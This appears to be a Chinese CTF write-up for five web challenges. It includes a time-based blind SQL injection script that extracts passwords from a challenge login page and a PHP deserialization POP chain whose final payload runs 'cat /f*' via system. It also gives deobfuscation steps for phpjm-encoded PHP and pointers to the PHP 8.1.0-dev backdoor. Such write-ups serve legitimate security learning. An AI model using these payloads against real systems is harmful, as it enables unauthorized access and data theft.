好家伙,比赛结束了还有一道0解web题是吧(

随缘写点wp(简单过头,看个乐就好)

目录

EasyMD5

PHP的后门

PHP的XXE

Easy_SQLi

雏形系统

EasyMD5

进来是个文件上传界面

说是只能上传pdf,那就改Content-Type为application/pdf,改文件名后缀为.pdf

上传恶意文件即可,发现要求文件内容不一样(已经开始暗示关键在文件内容了)

随便改个1,2试试,提示我们要md5碰撞

常见的MD5碰撞

这不直接拿flag了(

PHP的后门

bp抓包看响应头,得知php版本号 为8.1.0-dev

这个版本有个著名后门(怎么又是你)

PHP 8.1.0-dev 后门远程命令执行漏洞复现-腾讯云开发者社区-腾讯云

直接抄了打就行

PHP的XXE

进来就是个phpinfo的界面,甚至找不到XXE入口,这咋整呢

遇事不决先搜为敬

不难找到:BUUCTF-Real_buuctf xxe-CSDN博客

照着打就行,直接读本地文件

Easy_SQLi

家人们绷不住了,随手一试直接弱口令了(

测出字符型注入

走order by+union那条路子没回显

第一想法是写个时间盲注吧,回头想想其实布尔盲注也行QWQ

将错就错,贴出自己脚本吧

import requestsurl = 'http://challenge.qsnctf.com:31409/login.php'res = ""for i in range(1, 48, 1):for j in range(32, 128, 1):# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{j},sleep(0.5),0)#'# payload = f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{j},sleep(0.5),0)#"payload = f"if(ascii(substr((select group_concat(password) from users),{i},1))>{j},sleep(0.5),0)#"data = {'uname': "admin' and "+payload,'psw':123456}try:r = requests.post(url=url, data=data,timeout=0.2)except Exception as e:continueres += chr(j)print(res)break

雏形系统

进来啥也没有

这个表单也没action属性(

很明显,先信息搜集,萌新可以dirsearch扫,有点经验的师傅直接www.zip盲猜出来了

附件内容:

robots.txt

User-agent: Disallow: qsnctf.php

qsnctf.php

典啊,很典啊,建议看下面这篇文章

奇安信攻防社区-phpjm混淆解密浅谈

我们就按第一种方法来解混淆

先把qsnctf.php的eval改成echo

echo出来的内容:

$O0O000="KXpJtRrgqUOHcFewyoPSWnCbvkfMIdmxzsELYZBVGhDNuaATlQjiTaMhyQJUrZntqeKBsNwRckmlodVASYpWxjLEbIfCgvOFuizDPGXHwO9BitzTSmzUSgCsqp9sa3hPqg9sYgPuIsUBTDjTmHzUSmfXlgexqsfxigdTSmzUStjTSmzUSmzUSmfBYchjicAUhg5PKtG7mHzUSmzUSmzUqtCHlgPXSmQBbaFxnBNUSmzUSmzUStf1bpWMbsfpYc5XYgPolHfVa3QoZ3Qsic5kTmP7mHzUSmzUSmzUSmzUSmQ0igPxED5uIav0nXMGDeNNhtQNiaAywkfvq3AMnBNUSmzUSmzUSt0TSmzUSt0TSmzUSgFjbaFxStYomHzUSmf7mHzUSmzUSmzUqtCHlgPXSmQxIaU7mHzUSmzUSmzUqtCHlgPXSmQvI2Z7mHzUSmzUSmzUqtCHlgPXSmQMlkQPlkQMl247mHzUSmzUSmzUqtCHlgPXSgI1lpF0ic9uSe9VIgCxYth1b3GNTajTSmzUSmzUSmzUSmzUIcFNlszHRgdUCth5StFPqpPvlgP6IRfFIRLHnBNUSmzUSmzUSmzUSmzdYgvMqs0+ic5xqgCXYmUMnBNUSmzUSmzUSt0TSmzUSmzUSmfpYc5XYgPolHfMlkFBIcF0TmP7mHzUSmzUSmzUSmzUSgPpTmQ0igPxED5xIaU9wRYHl3dkhHbdYgvMqs0+bcYPwD0kIcPkitQPIc4kTGNUSmzUSmzUSmzUSmf7mHzUSmzUSmzUSmzUSmzUSmfPb2voSmQ0igPxED5MlkQPlkQMl247mHzUSmzUSmzUSmzUSt0TSmzUSmzUSmzUSmzUIcFNlszH8h+IvDL45lTf8h+SjHS7mHzUSmzUSmzUVGNUSmzUVGNTSmzUSgFjbaFxSLQPlc8TSmzUStjTSmzUSmzUSmfBYchjicAUhgL7mHzUSmzUSmzUq3QvYgPXSgI1lpF0ic9uSe9Vb2ejleF0baQMbsUdbcF0ic9uEmzdIg8MmHzUSmzUSmzUKBNUSmzUSmzUSmzUSmfklg9HbcBUhgS7mHzUSmzUSmzUSmzUSmQHTmQdl1jBaRd7mHzUSmzUSmzUVGNUSmzUVGNTSmzUSmQHSO0Uhe9GD1FZcsYBbaFxY29sImYYnBNUSmzUhgLUwRzda1fwZ1Qlh3CxIahubc1Ph107mHzUSmfzYc5xIahMbcWMKpZNhgLMnBNUSmzUicbUTmeMq3FPYmUdbHdMStjTSmzUSmzUSmfPb2voSmS9wD09wD09wD09wD09wD09wD1GDeNURc5BYaGUcc91qHfnbc1PSD09wD09wD09wD09wD09wD09wRS7mHzUSmf9mHzUSmfMIHUdbD09h2edlcPuhsbphgS9wRSkixepYcv1h3AUYgCxYmfdIc1oSHdTSmzUStjTSmzUSmzUSmfPb2voTmEkploPoIapHhOPHM8HTDjTSmzUSt0TmHzUSmz/wU=="; eval('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000), $OO0O00($O0O000,0,$OO0000))));?>

然后把这段复制下来,替换掉上面的echo语句,并将这段最后的eval改成echo即可

'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000), $OO0O00($O0O000,0,$OO0000))));?>

得到源码:

next::PLZ($this->pass);}}class wo{public $sex;public $age;public $intention;public function __destruct(){echo "Hi Try serialize Me!";$this->inspect();}function inspect(){if($this->sex=='boy'&&$this->age=='eighteen'){echo $this->intention;}echo "18岁";}}class Demo{public $a;static function __callStatic($action, $do){global $b;$b($do[0]);}}$b = $_POST['password'];$a = $_POST['username'];@unserialize($a);if (!isset($b)) {echo "==================PLZ Input Your Name!==================";}if($a=='admin'&&$b=="'k1fuhu's test demo"){echo("登录成功");}?>

瞪眼看链子

wo __destruct -> shi __toString -> Demo __callStatic

exp:

sex='boy';$a->age='eighteen';$a->intention=$b;$b->next=$c;$b->pass='cat /f*';echo serialize($a);

最终payload:

username=O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":0:{}s:4:"pass";s:7:"cat /f*";}}&password=system